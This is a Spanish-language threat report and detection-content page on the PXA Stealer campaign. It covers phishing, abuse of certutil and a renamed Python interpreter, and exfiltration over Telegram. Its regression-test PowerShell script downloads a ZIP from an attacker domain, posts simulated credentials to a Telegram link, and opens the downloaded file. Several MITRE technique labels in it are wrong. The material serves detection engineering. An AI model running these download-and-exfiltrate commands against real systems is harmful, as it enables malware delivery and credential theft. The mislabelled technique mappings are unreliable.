Del Phishing a la Exfiltración: Un Análisis Profundo de PXA Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe describe un fuerte aumento en la actividad de PXA Stealer dirigida a organizaciones financieras a principios de 2026. Los actores de amenazas distribuyen archivos ZIP maliciosos a través de correos electrónicos de phishing y dependen de una cadena de infección de múltiples etapas que abusa de herramientas legítimas del sistema y un intérprete de Python renombrado. Una vez activo, el malware roba credenciales de navegadores, contraseñas guardadas y datos de billeteras de criptomonedas, luego exfiltra la información recopilada a través de Telegram. La campaña destaca cómo los operadores han ajustado su oficio tras interrupciones previas en otros ecosistemas de infostealer.
Investigación
Investigadores de CyberProof reconstruyeron la cadena de ataque completa, comenzando con un correo electrónico de phishing que entregó un archivo Pumaproject.zip malicioso y terminando con exfiltraciones basadas en Telegram. Su análisis identificó el abuso de Certutil para decodificación, una copia de WinRAR disfrazada como picture.png para la extracción, una carpeta Dots oculta, y un intérprete de Python renombrado svchost.exe utilizado para lanzar un script ofuscado vinculado a un identificador de bot. La persistencia se mantiene mediante una entrada en el registro.
Mitigación
Los defensores deben identificar archivos adjuntos de archivo sospechosos, monitorear la ejecución de scripts y los LOLBins conocidos desde ubicaciones inesperadas, y bloquear el tráfico saliente a Telegram y TLDs inusuales como .shop and .xyz. Los equipos de seguridad también deben fortalecer las pasarelas de correo electrónico y aplicar controles estrictos de ejecución a archivos de Office y contenido basado en scripts.
Respuesta
Cuando se detecta PXA Stealer, aísle el host afectado, capture evidencia volátil y busque los artefactos de archivo y modificaciones del registro referenciados. Elimine archivos maliciosos, termine procesos afectados y restablezca cualquier credencial expuesta. Los equipos deben luego realizar una búsqueda de amenazas más amplia para encontrar indicadores coincidentes en todo el entorno y notificar a las partes interesadas relevantes.
Flujo de Ataque
Detecciones
Ejecución de Procesos del Sistema desde Rutas Atípicas (vía process_creation)
Ver
Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
Ejecución Sospechosa desde Perfil de Usuario Público (vía process_creation)
Ver
Extensión Inusual de Binario Ejecutable (vía process_creation)
Ver
Archivos Sospechosos en Perfil de Usuario Público (vía file_event)
Ver
Uso de Certutil para Codificación de Datos y Operaciones de Certificado (vía cmdline)
Ver
COIs (HashMd5) para detectar: Desde Phishing hasta Exfiltración: Un Análisis en Profundidad del PXA Stealer Parte 2
Ver
COIs (DestinationIP) para detectar: Desde Phishing hasta Exfiltración: Un Análisis en Profundidad del PXA Stealer
Ver
COIs (HashMd5) para detectar: Desde Phishing hasta Exfiltración: Un Análisis en Profundidad del PXA Stealer Parte 1
Ver
COIs (SourceIP) para detectar: Desde Phishing hasta Exfiltración: Un Análisis en Profundidad del PXA Stealer
Ver
COIs (HashSha256) para detectar: Desde Phishing hasta Exfiltración: Un Análisis en Profundidad del PXA Stealer
Ver
Detección de Actividades de Ejecución de PXA Stealer [Creación de Procesos de Windows]
Ver
Detectar Conexiones Salientes de PXA Stealer [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Prerequisito: El Chequeo de Pre‑vuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTP identificadas y apuntan a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa del Ataque y Comandos:
El actor de amenaza despliega el PXA Stealer en un host de Windows comprometido. Después de que el usuario sin darse cuenta ejecuta el binario malicioso inicial (T1204.002), el stealer ejecuta un fragmento de PowerShell que:-
Descarga un ZIP malicioso desde el dominio codificado
downloadtheproject.xyz(T1202 – ejecución de comando indirecto). -
Exfiltra los datos recopilados publicando un mensaje en un canal de Telegram a través de
t.me(T1559.002 – enlace de phishing). - Opcionalmente carga un componente COM malicioso para lograr persistencia (T1127.002).
Ambas solicitudes GET de salida generan los campos
DestinationDomainque la regla Sigma observa, provocando una alerta. -
Descarga un ZIP malicioso desde el dominio codificado
-
Script de Prueba de Regresión:
# Simulación de PXA Stealer – activa la regla de detección $tmpZip = "$env:TEMPpayload.zip" $tmpMsg = "$env:TEMPsteal.txt" # 1. Descargar ZIP malicioso desde el primer dominio malicioso Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing # 2. Simular exfiltración de datos a través de enlace de Telegram $payload = "Credenciales de usuario: admin / Pass123!" Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing # 3. (Opcional) Cargar un objeto COM ficticio para emular T1127.002 try { $com = New-Object -ComObject "Shell.Application" $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null } catch { # Ignorar errores – esto es solo para telemetría } -
Comandos de Limpieza:
# Eliminar artefactos creados por la simulación Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue